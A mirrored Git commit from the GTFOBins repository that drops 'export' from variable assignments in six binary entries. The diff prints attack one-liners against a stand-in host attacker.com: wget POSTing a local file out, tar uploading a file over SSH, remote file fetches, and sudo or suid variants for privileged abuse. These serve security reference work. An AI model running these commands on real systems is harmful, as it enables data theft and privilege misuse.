mirror/ GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-22 23:36:03 +02:00
Code Issues

Remove some useless instances of export

This commit is contained in:
Andrea Cardaci 2020-06-10 23:04:59 +02:00
parent 9aa7ec842e
commit 45308d4f58
6 changed files with 21 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
_gtfobins/busybox.md
View File

@ -6,7 +6,7 @@ functions:
file-upload:
- description: Serve files in the local folder running an HTTP server.
code: |
export LPORT=12345
LPORT=12345
busybox httpd -f -p $LPORT -h .
file-write:
- code: |

4
_gtfobins/jrunscript.md
View File

@ -22,8 +22,8 @@ functions:
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
URL=http://attacker.com/file_to_get
LFILE=file_to_save
jrunscript -e "cp('$URL','$LFILE')"
file-write:
- code: jrunscript -e 'var fw=new java.io.FileWriter("./file_to_write"); fw.write("DATA"); fw.close();'

2
_gtfobins/lwp-download.md
View File

@ -14,6 +14,6 @@ functions:
sudo:
- code: |
URL=http://attacker.com/file_to_get
export LFILE=file_to_save
LFILE=file_to_save
sudo lwp-download $URL $LFILE
---

4
_gtfobins/puppet.md
View File

@ -6,12 +6,12 @@ functions:
file-write:
- description: The file path must be absolute.
code: |
export LFILE="/tmp/file_to_write"
LFILE="/tmp/file_to_write"
puppet apply -e "file { '$LFILE': content => 'DATA' }"
file-read:
- description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
code: |
export LFILE=file_to_read
LFILE=file_to_read
puppet filebucket -l diff /dev/null $LFILE
sudo:
- code: |

14
_gtfobins/tar.md
View File

@ -14,17 +14,17 @@ functions:
file-upload:
- description: This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the `rmt` utility installed (it should be present by default in Debian-like distributions).
code: |
export RHOST=attacker.com
export RUSER=root
export RFILE=/tmp/file_to_send.tar
export LFILE=file_to_send
RHOST=attacker.com
RUSER=root
RFILE=/tmp/file_to_send.tar
LFILE=file_to_send
tar cvf $RUSER@$RHOST:$RFILE $LFILE --rsh-command=/bin/ssh
file-download:
- description: This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the `rmt` utility installed (it should be present by default in Debian-like distributions).
code: |
export RHOST=attacker.com
export RUSER=root
export RFILE=/tmp/file_to_get.tar
RHOST=attacker.com
RUSER=root
RFILE=/tmp/file_to_get.tar
tar xvf $RUSER@$RHOST:$RFILE --rsh-command=/bin/ssh
file-write:
- description: This only works for GNU tar.

16
_gtfobins/wget.md
View File

@ -3,25 +3,25 @@ functions:
file-upload:
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data.
code: |
export URL=http://attacker.com/
export LFILE=file_to_send
URL=http://attacker.com/
LFILE=file_to_send
wget --post-file=$LFILE $URL
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
URL=http://attacker.com/file_to_get
LFILE=file_to_save
wget $URL -O $LFILE
suid:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
URL=http://attacker.com/file_to_get
LFILE=file_to_save
./wget $URL -O $LFILE
sudo:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
URL=http://attacker.com/file_to_get
LFILE=file_to_save
sudo wget $URL -O $LFILE
---